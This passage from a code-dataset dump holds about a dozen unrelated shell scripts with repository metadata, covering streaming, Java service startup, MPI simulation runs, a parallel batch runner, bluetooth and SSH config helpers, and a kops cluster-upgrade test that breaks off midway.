# limit, 500 kbps) and remux it unchanged (-vcodec copy, no audio) to RTMP.
# Both tools' stderr is discarded to keep the terminal quiet.
raspivid -n -vf -hf -t 0 -w 960 -h 540 -fps 25 -b 500000 -o - 2> /dev/null | ffmpeg -i - -vcodec copy -an -metadata title="HenHouse Cam" -f flv $RTMP_URL/$STREAM_KEY 2> /dev/null
| true
|
9ee348ea2823face31c8b3bff23495c73f2e540b
|
Shell
|
adevore3/dotfiles
|
/autojump/functions/make_project_symlink.func
|
UTF-8
| 728
| 4.1875
| 4
|
[
"Unlicense",
"LicenseRef-scancode-public-domain",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#!/bin/bash

# Create a symlink for the current repo (in the parent directory) named after
# the lowercased jira project from repo.cfg, then cd into the resolved link.
# Returns 1 if repo.cfg is missing or the link name already exists as a dir.
function make_project_symlink() {
    local repo_file="repo.cfg"
    if [ ! -f "$repo_file" ]; then
        echo "ERROR: '$repo_file' does NOT exist, exiting..."
        return 1
    fi

    # jira_project* are intentionally left global for compatibility with the
    # original behaviour (callers may inspect them after the call).
    # grep reads the file directly instead of the old "cat | grep".
    jira_project=$(grep jira "$repo_file" | cut -d= -f2)
    jira_project_lowercase=$(echo "$jira_project" | tr '[:upper:]' '[:lower:]')

    local fqpn
    fqpn=$(pwd)

    # Create symlink in parent directory. All expansions are now quoted so
    # paths containing spaces no longer break the function.
    cd ..
    if [ -d "$jira_project_lowercase" ]; then
        echo "ERROR: '$jira_project_lowercase' is already a directory, exiting..."
        return 1
    fi
    ln -s "$fqpn" "$jira_project_lowercase"

    # Verify the symlink works and end up back where we started (resolved).
    cd "$jira_project_lowercase"
    cd -P .
}
| true
|
803c5878ede11605181e964b836937bc273d998d
|
Shell
|
ln3012/my1repo
|
/ifelse
|
UTF-8
| 224
| 3.75
| 4
|
[] |
no_license
|
#!/bin/sh
# Report whether the numeric argument is positive or negative.

# Require exactly one (numeric) argument.
if [ $# -eq 0 ]; then
    echo "$0 : You must give numerics only"
    exit 1
fi

# Values greater than zero are positive; everything else is reported negative.
if [ "$1" -gt 0 ]; then
    echo "$1 positive number"
else
    echo "$1 negative number"
fi
| true
|
f7698503beba214db6ee608d59b72c1497eaa643
|
Shell
|
chittineni8/docker-compose-magento
|
/bin/inapp
|
UTF-8
| 105
| 2.65625
| 3
|
[] |
no_license
|
#!/bin/bash
# Open an interactive bash shell in a docker-compose service.
# Defaults to the "app" service when no service name is given as $1.
docker-compose exec ${1:-app} bash
| true
|
4d7065ed61079b1ccbd198e73940eec09f950028
|
Shell
|
yuelicn/apollo
|
/scripts/apollo-on-kubernetes/apollo-portal-server/scripts/startup-kubernetes.sh
|
UTF-8
| 3,021
| 3.453125
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Startup script for the Apollo portal server inside Kubernetes: builds the
# JVM options (GC flags chosen by Java major version), launches the service
# jar, and then blocks forever so the container stays alive.
SERVICE_NAME=apollo-portal
## Adjust log dir if necessary
LOG_DIR=/opt/logs/apollo-portal-server
## Adjust server port if necessary
SERVER_PORT=8070
# SERVER_URL="http://localhost:$SERVER_PORT"
SERVER_URL="http://${APOLLO_PORTAL_SERVICE_NAME}:${SERVER_PORT}"
## Adjust memory settings if necessary
#export JAVA_OPTS="-Xms2560m -Xmx2560m -Xss256k -XX:MetaspaceSize=128m -XX:MaxMetaspaceSize=384m -XX:NewSize=1536m -XX:MaxNewSize=1536m -XX:SurvivorRatio=8"
## Only uncomment the following when you are using server jvm
#export JAVA_OPTS="$JAVA_OPTS -server -XX:-ReduceInitialCardMarks"
########### The following is the same for configservice, adminservice, portal ###########
export JAVA_OPTS="$JAVA_OPTS -XX:ParallelGCThreads=4 -XX:MaxTenuringThreshold=9 -XX:+DisableExplicitGC -XX:+ScavengeBeforeFullGC -XX:SoftRefLRUPolicyMSPerMB=0 -XX:+ExplicitGCInvokesConcurrent -XX:+HeapDumpOnOutOfMemoryError -XX:-OmitStackTraceInFastThrow -Duser.timezone=Asia/Shanghai -Dclient.encoding.override=UTF-8 -Dfile.encoding=UTF-8 -Djava.security.egd=file:/dev/./urandom"
export JAVA_OPTS="$JAVA_OPTS -Dserver.port=$SERVER_PORT -Dlogging.file=$LOG_DIR/$SERVICE_NAME.log -XX:HeapDumpPath=$LOG_DIR/HeapDumpOnOutOfMemoryError/"
# Find Java: prefer $JAVA_HOME, then whatever is on PATH, then /usr/bin/java.
if [[ -n "$JAVA_HOME" ]] && [[ -x "$JAVA_HOME/bin/java" ]]; then
javaexe="$JAVA_HOME/bin/java"
elif type -p java > /dev/null 2>&1; then
javaexe=$(type -p java)
elif [[ -x "/usr/bin/java" ]]; then
javaexe="/usr/bin/java"
else
echo "Unable to find Java"
exit 1
fi
if [[ "$javaexe" ]]; then
version=$("$javaexe" -version 2>&1 | awk -F '"' '/version/ {print $2}')
version=$(echo "$version" | awk -F. '{printf("%03d%03d",$1,$2);}')
# now version is of format 009003 (9.3.x)
# NOTE(review): the >=11, >=10 and >=9 branches below set identical
# unified-logging GC options; only the final (Java 8 and older) branch
# differs. They look collapsible into a single ">= 9" test — confirm
# before simplifying.
if [ $version -ge 011000 ]; then
JAVA_OPTS="$JAVA_OPTS -Xlog:gc*:$LOG_DIR/gc.log:time,level,tags -Xlog:safepoint -Xlog:gc+heap=trace"
elif [ $version -ge 010000 ]; then
JAVA_OPTS="$JAVA_OPTS -Xlog:gc*:$LOG_DIR/gc.log:time,level,tags -Xlog:safepoint -Xlog:gc+heap=trace"
elif [ $version -ge 009000 ]; then
JAVA_OPTS="$JAVA_OPTS -Xlog:gc*:$LOG_DIR/gc.log:time,level,tags -Xlog:safepoint -Xlog:gc+heap=trace"
else
# Pre-9 JVMs: ParNew + CMS with classic GC logging flags.
JAVA_OPTS="$JAVA_OPTS -XX:+UseParNewGC"
JAVA_OPTS="$JAVA_OPTS -Xloggc:$LOG_DIR/gc.log -XX:+PrintGCDetails"
JAVA_OPTS="$JAVA_OPTS -XX:+UseConcMarkSweepGC -XX:+UseCMSCompactAtFullCollection -XX:+UseCMSInitiatingOccupancyOnly -XX:CMSInitiatingOccupancyFraction=60 -XX:+CMSClassUnloadingEnabled -XX:+CMSParallelRemarkEnabled -XX:CMSFullGCsBeforeCompaction=9 -XX:+CMSClassUnloadingEnabled -XX:+PrintGCDateStamps -XX:+PrintGCApplicationConcurrentTime -XX:+PrintHeapAtGC -XX:+UseGCLogFileRotation -XX:NumberOfGCLogFiles=5 -XX:GCLogFileSize=5M"
fi
fi
printf "$(date) ==== Starting ==== \n"
# The jar is executable (Spring Boot launch script); "start" daemonizes it.
cd `dirname $0`/..
chmod 755 $SERVICE_NAME".jar"
./$SERVICE_NAME".jar" start
rc=$?;
if [[ $rc != 0 ]];
then
echo "$(date) Failed to start $SERVICE_NAME.jar, return code: $rc"
exit $rc;
fi
# Keep the container's PID 1 alive while the service runs in the background.
tail -f /dev/null
| true
|
ad8d0e7902bb5dc868a76ea979c1b6b56de24764
|
Shell
|
JayjeetAtGithub/seissol-workflows
|
/workflows/scc18-containerless/scripts/run.sh
|
UTF-8
| 966
| 3.34375
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash

# Run a SeisSol simulation for the scc18-containerless workflow.
# Required environment: SEISSOL_SRC_DIR, OMP_NUM_THREADS,
# MPI_NUM_PROCESSES, SEISSOL_END_TIME.
set -e

if [ -z "$SEISSOL_SRC_DIR" ]; then
    echo "Expecting SEISSOL_SRC_DIR variable"
    exit 1
fi

if [ -z "$OMP_NUM_THREADS" ]; then
    echo "No OMP_NUM_THREADS variable defined"
    exit 1
fi

if [ -z "$MPI_NUM_PROCESSES" ]; then
    # Fixed: the message had a typo ("MPI_NUM_ROCESSES") and the bare "exit"
    # returned status 0, so callers could not detect the failure.
    echo "No MPI_NUM_PROCESSES variable defined"
    exit 1
fi

if [ -z "$SEISSOL_END_TIME" ]; then
    echo "No SEISSOL_END_TIME variable defined"
    exit 1
fi

REPO_DIR="$PWD/"
BASE_PATH="$REPO_DIR/workflows/scc18-containerless"
EXECUTION_DIR="$BASE_PATH/execution"

source "$BASE_PATH/scripts/setup-env.sh"

# Locate the built SeisSol binary and stage it into the execution directory.
SEISSOL_BIN="$(ls $REPO_DIR/$SEISSOL_SRC_DIR/build/SeisSol_*)"
cp "$SEISSOL_BIN" "$EXECUTION_DIR"
mkdir -p "$EXECUTION_DIR/output"

# run
cd "$EXECUTION_DIR"
# Patch the requested simulation end time into the parameter file.
sed -i "s#EndTime = .*#EndTime = $SEISSOL_END_TIME#" parameters_zenodo_easi.par
echo "$REPO_DIR/$SEISSOL_SRC_DIR/Maple/" > DGPATH
mpirun \
    --oversubscribe \
    -np "$MPI_NUM_PROCESSES" \
    "$SEISSOL_BIN" \
    parameters_zenodo_easi.par > output/stdout.txt
| true
|
3d861d6d1663526df77c495a0d421fcf18ceb6c9
|
Shell
|
dingmeikun/plugins
|
/ltts-data-plugin/src/main/resources/bin/volley
|
UTF-8
| 8,487
| 3.546875
| 4
|
[] |
no_license
|
#!/bin/ksh
# On Linux, make "echo" interpret backslash escapes (the rest of this script
# relies on echo emitting terminal escape sequences).
HOST_TYPE=`uname -s | tr "-" "_"`
if [ $HOST_TYPE = "Linux" ]
then
alias echo="echo -e"
fi
#
# volley  Parallel Process
#
# Default Value
#---------------------
Ver=2.1 # Version
Tty=`tty | awk -F \/ '{print $3"/"$4}'` # Terminal (e.g. pts/0); used later by ps to find our child processes
cpuUse=2 # Max CPU Cost
cpuFree=20 # Min CPU Free
endLine=`tput lines` # Screen EndLine
vLine=`expr $endLine - 6` # volley Lines (rows of the channel grid; 6 rows reserved for header/footer)
expr \( `tput cols` + 1 \) / 27 | read vCol # volley Cols (27 columns per channel cell); pipe-into-read works because ksh runs the last pipeline stage in the current shell
if [ $vLine -lt 1 -o $vCol -lt 3 ]; then
echo "Err: Screen is Too Small to show Menu (7*80 at least)"
exit
fi
maxP=`expr $vLine \* $vCol` # Max Channel (one screen cell per parallel channel)
if [ $maxP -gt 1024 ]; then
echo "Err: More than 1024 Channels, To reduce the screen"
exit
fi
Volley=$maxP # Max Parallels
AutoKey=1 # Auto-KeyPress Model (C-Continue, Q-Quite); 0 means interactive key presses
usage(){
# Print the help text and exit. The '*' at the start of each heredoc line
# is a left margin; the awk at the end of the pipeline strips it.
cat <<-!!! |
*
*volley : Parallel Process $Ver
*
*Usage:
*	volley [-parameter...] BatFile
*Parameter:
*	-u	Max CPU Cost per Process (Default $cpuUse)
*	-f	Min CPU Idle (Default $cpuFree)
*	-v	Max concurrency (1-$Volley) (Default $Volley)
*	-k	Backgroup model (C: Continue when Err, Q: Quite When Err)
*BatchFile note:
*	#Comment
*	!BAT File Name
*	%Command1_desc	Command1
*	Command2
*	==========	(Waiting For last Command Finished)
*	%Command3_desc	Command3
*Output file:
*	BateFile.err	Error process & Error Info
*	BateFile.bak	Fail Command & Unexecuted Command
*
!!!
awk -F'*' '{ print $2 }'
exit
}
# Prepare Parameter
#---------------------
# -u/-f/-v take validated numeric arguments; -k selects the auto-keypress
# behaviour; anything invalid falls through to usage() (which exits).
while getopts :u:f:v:k: OPTION
do
case $OPTION in
u)
# Per-process CPU cost, 0-99.
test $OPTARG -ge 0 -a $OPTARG -le 99 2>/dev/null
if [ $? -ne 0 ]; then usage; fi
cpuUse=$OPTARG ;;
f)
# Minimum CPU idle percentage, 0-99.
test $OPTARG -ge 0 -a $OPTARG -le 99 2>/dev/null
if [ $? -ne 0 ]; then usage; fi
cpuFree=$OPTARG ;;
v)
# Max concurrency, capped by the screen-derived channel count.
test $OPTARG -ge 1 -a $OPTARG -le $Volley 2>/dev/null
if [ $? -ne 0 ]; then usage; fi
Volley=$OPTARG ;;
k)
# Background model: C = continue on error, Q = quit on error.
if [ "$OPTARG" = "C" -o "$OPTARG" = "Q" ]; then
AutoKey=$OPTARG
else
usage
fi ;;
?)
usage ;;
esac
done
# Drop the parsed options; exactly one batch-file argument must remain.
shift `expr $OPTIND - 1`
if [ $# -ne 1 ]; then usage; fi
if [ ! -f $1 ]; then usage; fi
# A process only counts as schedulable headroom if the CPU has room for it.
cpuFree=`expr $cpuFree + $cpuUse`
# Variable
#--------------------------------------
tsk=0 # Total Tasks
fnd=0 # Finished Tasks
err=0 # Error Tasks
run=0 # Processing Tasks
free=$Volley # Free process
errbz=0 # Error Flag
cpuIdle=0 # cpu Idle
#--------------------------------------
fbat=$1 # BAT File
ftmp=$1.tmp # Tmp File
ferr=$1.err # Err File
fbak=$1.bak # Bak File
bname="Parallel Process" # BAT File Name
#--------------------------------------
# y,x Array for coordinate
# pn Array for process name
# id Array for process ID
# pe Process Order
#--------------------------------------
# STTYSAVE # Terminal Info
# Test Output
#--------------------
>$ftmp
if [ $? -ne 0 ]; then
echo "Permission is Forbidden"
exit
fi
rm $ftmp
# Test Input
#---------------------
read tsk<<-!!
`awk '{
if(NF==0) next;
c=substr($1,1,1)
if(c=="#" || c=="=" || c=="!") next;
print $1
}' $fbat | wc -l`
!!
if [ $tsk -lt 1 ]; then
echo "Input File <$fbat> Invalid!"
exit
fi
a=`grep "^!" $fbat | head -1`
if [ -n "$a" ]; then
bname=`expr substr "$a" 2 78`
fi
# Init
#----------------------------------
if [ "$AutoKey" = "0" ]; then
STTYSAVE="`stty -g`"
stty -echo
fi
clear
a=`awk -v vCol=$vCol 'BEGIN{ for(i=3;i<vCol;i++)printf("- -------------------------"); print "" }'`
echo "[1m$bname[0m"
echo "----------------------------------------------------- -------------------------$a"
echo " Miss: Fins: Errs: Pros:0 CpuFree:"
echo "[3;24H$tsk"
echo "----------------------------------------------------- -------------------------$a"
echo "[`expr $endLine - 1`;0H\c"
echo "----------------------------------------------------- -------------------------$a"
echo " Volley$Ver\c"
awk -v vLine=$vLine -v vCol=$vCol -v Volley=$Volley '
BEGIN{
for(vc=0;vc<vCol;vc++)
for(vl=0;vl<vLine;vl++)
{
i=vl+vc*vLine;
y=vl+5;
x=vc*27+1;
printf "y[%d]=%d;\t",i,y
printf "x[%d]=%d;\t",i,x
printf "pn[%d]=%d;\t",i,i
printf "id[%d]=0;\t",i
printf "pe[%d]=%d;\t",i,i+1
printf "echo \"[%d;%dH.\\c\"\n",y,x
}
}' >$ftmp
. $ftmp
echo "[$endLine;16HStartTime`date +%X` CurrentTime\c"
if [ "$AutoKey" = "0" ]; then
stty raw
fi
# Function
#-----------------------
# Waiting for Key Press
# Read single raw bytes from the tty until one of the characters listed in
# $1 is pressed; echo the accepted character so callers can capture it.
gWaitKey(){
while :; do
FTmp=`dd if=/dev/tty bs=1 count=1 2>/dev/null`
if [ `expr index "$FTmp" "$1"` -eq 1 ]; then break; fi
done
echo $FTmp
}
# Refresh Process & Free Process
freeidle(){
# Refresh Time
echo "[$endLine;43H`date +%X`[D\c"
# Finished Process
echo "${id[*]}" |
awk -v fnd=$fnd -v Tty=$Tty '
BEGIN{
cmd="ps -t "Tty
i=0
while(cmd|getline a){
if(++i==1) continue
split(a,b)
ps[b[1]]=0
}
run=0
RS=" "
}
{
if($1==0) next
if($1 in ps) run++
else
printf "pe[%d]=%d; id[%d]=0;\n",NR-1,++fnd+"'$maxP'",NR-1
}
END{
printf "fnd=%d; echo \"[3;36H%d\\c\"\n",fnd,fnd
printf "run=%d; echo \"[3;60H%d [D[D\\c\"\n",run,run
printf "free=%d\n","'$Volley'"-run
}' >$ftmp
. $ftmp
# Refresh Errors
a=`grep "^%" $fbak | wc -l`
if [ $a -ne $err ]; then
err=$a
echo "[3;48H$err\c"
fi
# Refresh CPU Idle
cpuIdle=`sar 1 1 | tail -1 | awk '{print $8}' | awk -F \. '{print $1}'`
if [ -z "$cpuIdle" ]
then
cpuIdle=99
fi
echo "[3;75H$cpuIdle% [D[D[D\c"
}
# Return blank unless Find a free process
# Scan the pe[] order array (space-joined) and print the index of the free
# channel with the lowest positive order number; print nothing when all
# channels are busy (pe entries of 0 mean "in use").
idle(){
echo "${pe[*]}" |
awk '
BEGIN{ RS=" "; min=999999; idle=999999; }
{
if($1>0 && $1<min){ min=$1; idle=NR-1; }
}
END{ if(idle<999999) print idle; }
'
}
# Main Function
#----------------------
runflag=1	# Execute Flag: 1-execute, 2-Quite (stop scheduling, only back up remaining commands)
> $ferr		# truncate the error log
echo "!$bname" >$fbak	# bak file starts with the batch name line
# Normalise the batch file into "name command" lines:
#  - blank lines, comments (#) and the name line (!) are dropped
#  - "=" separator lines become a literal "=========" barrier token
#  - "%desc cmd" keeps desc (23 chars max) as the task name
#  - plain commands get a name synthesised from their words
awk '{
if(NF==0) next;
c=substr($1,1,1)
if(c=="#" || c=="!") next;
if(c=="="){ print "========="; next; }
if(c=="%"){
i=2; printf substr($1,2,23);
}
else{
i=1; pn=$1; for(t=2;t<=NF;t++) pn=pn"_"$t
printf substr(pn,1,23)
}
for(;i<NF;i++) printf " "$i
print " "$i
}' $fbat |
while read pname pcomm
do
# Save Bak File when break
if [ $runflag -eq 2 ]; then
echo "%$pname $pcomm" >> $fbak
next
fi
# process parallel
if [ "$pname" = "=========" ]; then
echo "$pname" >> $fbak
while [ $run -ne 0 ]; do freeidle; done
# Pause when last Command Error
if [ $errbz -lt $err ]; then
echo "[$endLine;55H[7mError!Press C-Continue Q-Quite[0m[$endLine;67H\c";
if [ "$AutoKey" = "0" ]; then
a=`gWaitKey CQ`
else
a=$AutoKey
fi
echo "[$endLine;55H \c";
if [ "$a" = "Q" ]; then
runflag=2
next
fi
errbz=$err
fi
next
fi
# Waiting for CPU Idle
while [ "$cpuIdle" -le "$cpuFree" ]; do freeidle; done
# Waiting For Free Process
while [ $run -ge $Volley ]; do freeidle; done
# Find a Process
pnum=`idle`
# Record channel
pe[$pnum]=0
pn[$pnum]=`echo $pname | tr '' ' '`
run=`expr $run + 1`
cpuIdle=`expr $cpuIdle - $cpuUse`
# add Process
{
yy=${y[$pnum]}
xx=${x[$pnum]}
echo "[$yy;${xx}H [$yy;${xx}H[7m->${pn[$pnum]}[0m\c"
fpout=$fbat.$pnum
echo "%$pname $pcomm" >$fpout
fdate=$fbat.date
echo "%$pname begin " `date +%X` >> $fdate
echo "-----------------------" >>$fpout
eval "$pcomm" 1>>$fpout 2>&1
res=$?
if [ $res -ne 0 ]; then
echo "<ErrorCode: $res>" >> $fpout
echo "----------------------" >>$fpout
cat $fpout >>$ferr
echo "%$pname $pcomm" >> $fbak
echo "[$yy;${xx}H[7m*[0m${pn[$pnum]}\c"
echo "%$pname fail " `date +%X` >> $fdate
else
echo "[$yy;${xx}H0${pn[$pnum]}\c"
#add by liusc
echo "%$pname success " `date +%X` >> $fdate
fi
rm $fpout
} &
res=$?
if [ $res -ne 0 ]; then
echo "%$pname $pcomm" >>$fbak
echo "*Fork error!* %$pname $pcomm" >>$ferr
fi
# record Process Flag
id[$pnum]=$!
done
# exit process
while [ $run -ne 0 ]; do freeidle; done
if [ $err -eq 0 ]; then rm -f $ferr $fbak; fi
echo "[$endLine;35HEndTime\c"
echo "[$endLine;55H[7mComplete!PressQ to Quite[0m[$endLine;69H\c"
if [ "$AutoKey" = "0" ]; then
gWaitKey Q
stty "$STTYSAVE"
clear
else
echo "Q"
fi
rm -f $ftmp
return $err
| true
|
2a6d7cec1d21aec186fb48055114bca952a5bb12
|
Shell
|
justpayne/jburkardt-f77
|
/toms626/toms626_prb1.sh
|
UTF-8
| 525
| 2.984375
| 3
|
[] |
no_license
|
#!/bin/bash
#
# Compile, link and run toms626_prb1, saving its output to a text file.
#
if ! gfortran -c -g toms626_prb1.f >& compiler.txt; then
  echo "Errors compiling toms626_prb1.f"
  exit
fi
rm compiler.txt
#
if ! gfortran toms626_prb1.o -L$HOME/libf77/$ARCH -ltoms626 -lcalcomp; then
  echo "Errors linking and loading toms626_prb1.o"
  exit
fi
rm toms626_prb1.o
#
mv a.out toms626_prb1
if ! ./toms626_prb1 > toms626_prb1_output.txt; then
  echo "Errors running toms626_prb1"
  exit
fi
rm toms626_prb1
#
echo "Test results written to toms626_prb1_output.txt."
| true
|
7b4ca3652fe0e58b371e337ce0c2cedcd1fa8a9e
|
Shell
|
NoLegalTech/nosediceasi
|
/db/migrations-functions
|
UTF-8
| 1,513
| 4.21875
| 4
|
[] |
no_license
|
#!/bin/bash
# Helper functions for running SQL migrations; migrations live in the
# "migrations" directory next to this script.
script_dir="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
declare -a migrations  # migration numbers collected by get_all_migrations*
migration=all          # which migration to run: "all" or a single number
function migrate {
# Run a single migration. $1 = "up" or "down"; $2 = migration number,
# zero-padded to four digits to match the NNNN.sql / NNNN.down.sql files.
migrationType=$1
migrationNumber=$2
number=$(printf "%04d\n" $migrationNumber)
echo "Running migration ${number} [${migrationType}]";
[[ $migrationType == "up" ]] && {
mysql --defaults-extra-file=${script_dir}/config < ${script_dir}/migrations/${number}.sql
}
[[ $migrationType == "down" ]] && {
mysql --defaults-extra-file=${script_dir}/config < ${script_dir}/migrations/${number}.down.sql
}
}
function parse_args {
# $1 selects a single migration number; empty/absent means "all".
migration=$1
[[ $migration == "" ]] && {
migration=all
}
}
function get_all_migrations {
# Collect forward migration numbers (NNNN) from migrations/*.sql into the
# global `migrations` array, in ascending (ls) order, skipping rollback
# (*.down.sql) files.
list=$(ls $script_dir/migrations/*.sql)
for file in $list
do
filename=$(echo ${file##*/})
number=${filename%.*}
# Fixed: this previously piped the output of the nonexistent command
# "unknown" (always empty) into grep, so the filter never matched and
# *.down.sql rollback files were wrongly added to the array.
echo "$filename" | grep ".down." > /dev/null || migrations+=(${number})
done
}
function get_all_migrations_reversed {
# Same as get_all_migrations but in descending order (for rollbacks):
# collect forward migration numbers from migrations/*.sql, newest first,
# skipping rollback (*.down.sql) files.
list=$(ls $script_dir/migrations/*.sql | sort -nr)
for file in $list
do
filename=$(echo ${file##*/})
number=${filename%.*}
# Fixed: "$(unknown)" (nonexistent command, empty output) made the grep
# filter always fail, so *.down.sql files were wrongly included.
echo "$filename" | grep ".down." > /dev/null || migrations+=(${number})
done
}
function run_migrations {
# Run either every collected migration (when migration=all) or only the
# single selected one. $1 = "up" or "down", forwarded to migrate().
migrationType=$1
[[ "$migration" == "all" ]] && {
for number in "${migrations[@]}"
do
migrate $migrationType $number
done
}
[[ "$migration" == "all" ]] || {
migrate $migrationType $migration
}
}
| true
|
d4dd28fbfcc8cf0435982154ca48a7009947efa5
|
Shell
|
dlux/vagrant-manual-openstack
|
/apt/cinder-controller.sh
|
UTF-8
| 1,616
| 2.796875
| 3
|
[] |
no_license
|
#!/bin/bash
# Install and configure the OpenStack Block Storage (Cinder) controller
# services on Ubuntu (Juno cloud archive).

# 0. Post-installation
/root/shared/proxy.sh
source /root/shared/hostnames.sh
echo "source /root/shared/openstackrc" >> /root/.bashrc

# 1. Install OpenStack Block Storage Service and dependencies
apt-get install -y ubuntu-cloud-keyring
echo "deb http://ubuntu-cloud.archive.canonical.com/ubuntu trusty-updates/juno main" >> /etc/apt/sources.list.d/juno.list
apt-get update && apt-get dist-upgrade
apt-get install -y cinder-api cinder-scheduler python-cinderclient

# 2. Configure message broker service (heredoc appends the same lines the
# individual echo calls used to; ${my_ip} is expanded by the shell)
cat >> /etc/cinder/cinder.conf << EOF
rabbit_host = message-broker
rabbit_password = secure
auth_strategy = keystone
my_ip = ${my_ip}
EOF

# 3. Configure Identity Service
cat >> /etc/cinder/cinder.conf << EOF
auth_strategy = keystone

[keystone_authtoken]
identity_uri = http://identity:35357
admin_tenant_name = service
admin_user = cinder
admin_password = secure
EOF

# 4. Configure Database driver
cat >> /etc/cinder/cinder.conf << EOF

[database]
connection = mysql://cinder:secure@database/cinder
EOF

# 5. Generate tables
apt-get install -y python-mysqldb
rm -f /var/lib/cinder/cinder.sqlite
su -s /bin/sh -c "cinder-manage db sync" cinder

# 6. Enable and start services
service cinder-scheduler restart
service cinder-api restart
|
f85edbf9bd4f37dcf5df304e53189ec451650f9a
|
Shell
|
cyrilvj94/ShellScriptExamples
|
/1_Conditionals/Q_1_random_3.sh
|
UTF-8
| 355
| 3.578125
| 4
|
[] |
no_license
|
#! /bin/bash
# Draw five random 3-digit numbers, print each one, then report the
# maximum and minimum of the set.

for ((i = 0; i < 5; i++)); do
    arr_name[$i]=$((100 + (RANDOM % 900)))
done

# Seed the running extremes with the first element.
max=${arr_name[0]}
min=${arr_name[0]}

for value in "${arr_name[@]}"; do
    echo $value
    if [ $value -lt $min ]; then
        min=$value
    fi
    if [ $value -gt $max ]; then
        max=$value
    fi
done

echo ${arr_name[@]}
echo max $max
echo min $min
| true
|
86c3e365c54f276265b99e4876c4d783891f46cb
|
Shell
|
mushfiq814/dotfiles
|
/scripts/single-file-scripts/btconnect
|
UTF-8
| 346
| 3.421875
| 3
|
[] |
no_license
|
#!/bin/sh
# Pick a paired bluetooth device via rofi and connect to it.

DEVICES=$(bluetoothctl devices)

# Offer device names (3rd field of "Device <MAC> <Name>") in rofi; a
# dismissed menu yields an empty selection and we bail out quietly.
SELECTION=$(echo "$DEVICES" | awk -F' ' '{print $3}' | rofi -dmenu -i -p "connect to which device?")
[ -z "$SELECTION" ] && exit 0

# Map the chosen name back to its MAC address (2nd field).
ID=$(echo "$DEVICES" | grep "$SELECTION" | awk -F' ' '{print $2}')
[ -z "$ID" ] && exit 0

echo "connecting to $SELECTION..."
bluetoothctl connect "$ID"
| true
|
ff32de5d3a032116e10f6b7f6bb50e31a2415f47
|
Shell
|
edgarklerks/dotfiles
|
/scripts/bla.zsh
|
UTF-8
| 489
| 2.890625
| 3
|
[
"BSD-2-Clause"
] |
permissive
|
# Rebuild ~/.ssh/config from the fragment files in ~/.ssh/config.d, but only
# when the newest fragment is more recent than the assembled config. The
# leading guard requires the directory to exist and be non-empty.
[ -e ~/.ssh/config.d ] && find ~/.ssh/config.d -print -quit | grep -q . && (
#newestconfig=$(ls -t ~/.ssh/config.d/ | head -1)
# Most recently modified fragment: '%T+ path' lines sort by timestamp
# lexicographically (requires GNU find).
newestconfig=$(find ~/.ssh/config.d/* -printf '%T+ %p\n' | sort -r | head -n1 | awk '{print $2}')
if [ "$newestconfig" -nt ~/.ssh/config ]; then
# Keep a timestamped backup of the old config, then concatenate all
# fragments in stable (NUL-safe, sorted) order into a fresh config.
[ -e ~/.ssh/config ] && mv ~/.ssh/config ~/.ssh/config.bak.$(date -Ins)
find ~/.ssh/config.d/* -type f -print0 | sort -z | xargs -0 -n1 cat > ~/.ssh/config
fi
)
| true
|
9763abebf6bc065b89454f93387cec3e3afac68d
|
Shell
|
ahmeddrawy/kops
|
/tests/e2e/scenarios/upgrade/run-test
|
UTF-8
| 3,011
| 2.828125
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
# Copyright 2020 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

# E2E upgrade scenario: build kops from this repo, create a v1.18 cluster,
# roll it to v1.19, then run the conformance-style test suite against it.
set -o errexit
set -o nounset
set -o pipefail

echo "CLOUD_PROVIDER=${CLOUD_PROVIDER}"

# NOTE(review): SpecOverrideFlag is prepended unconditionally — presumably
# required by the "kops set cluster" call later; confirm before removing.
export KOPS_FEATURE_FLAGS="SpecOverrideFlag,${KOPS_FEATURE_FLAGS:-}"

REPO_ROOT=$(git rev-parse --show-toplevel);
# Put the locally built kops binary first on PATH.
PATH=$REPO_ROOT/bazel-bin/cmd/kops/$(go env GOOS)-$(go env GOARCH):$PATH

# Flags shared by every kubetest2 invocation below.
KUBETEST2_COMMON_ARGS="-v=2 --cloud-provider=${CLOUD_PROVIDER} --cluster-name=${CLUSTER_NAME:-} --kops-binary-path=${REPO_ROOT}/bazel-bin/cmd/kops/linux-amd64/kops"
KUBETEST2_COMMON_ARGS="${KUBETEST2_COMMON_ARGS} --admin-access=${ADMIN_ACCESS:-}"

export GO111MODULE=on
# Install kubetest2 plus the kops deployer/tester plugins from this repo.
go get sigs.k8s.io/kubetest2@latest

cd ${REPO_ROOT}/tests/e2e
go install ./kubetest2-kops
go install ./kubetest2-tester-kops

# Build kops artifacts and stage them for the cluster under test.
kubetest2 kops ${KUBETEST2_COMMON_ARGS} --build --kops-root=${REPO_ROOT} --stage-location=${STAGE_LOCATION:-}

# Always tear-down the cluster when we're done
function finish {
  kubetest2 kops ${KUBETEST2_COMMON_ARGS} --down || echo "kubetest2 down failed"
}
trap finish EXIT
# Bring the cluster up at the old Kubernetes version, then upgrade it.
kubetest2 kops ${KUBETEST2_COMMON_ARGS} \
    --up \
    --kubernetes-version=v1.18.15 \
    --create-args="--networking calico"

kops set cluster ${CLUSTER_NAME} cluster.spec.kubernetesVersion=v1.19.7
kops update cluster
kops update cluster --admin --yes
kops rolling-update cluster
kops rolling-update cluster --yes --validation-timeout 30m
kops validate cluster

KUBECONFIG=${HOME}/.kube/config
TEST_ARGS="--kubeconfig=${KUBECONFIG}"

if [[ "${CLOUD_PROVIDER}" == "aws" ]]; then
  # Read the zones into a proper array. Fixed: the previous scalar
  # assignment (ZONES=`...`) made ${ZONES[0]} expand to the whole
  # newline-separated list whenever the cluster had more than one zone.
  ZONES=($(kops get cluster ${CLUSTER_NAME} -ojson | jq -r .spec.subnets[].zone))
  CLUSTER_TAG="${CLUSTER_NAME}"
  TEST_ARGS="${TEST_ARGS} --provider=aws --cluster-tag=${CLUSTER_TAG}"
  # For historical reasons, the flag name for e2e tests on AWS is --gce-zone
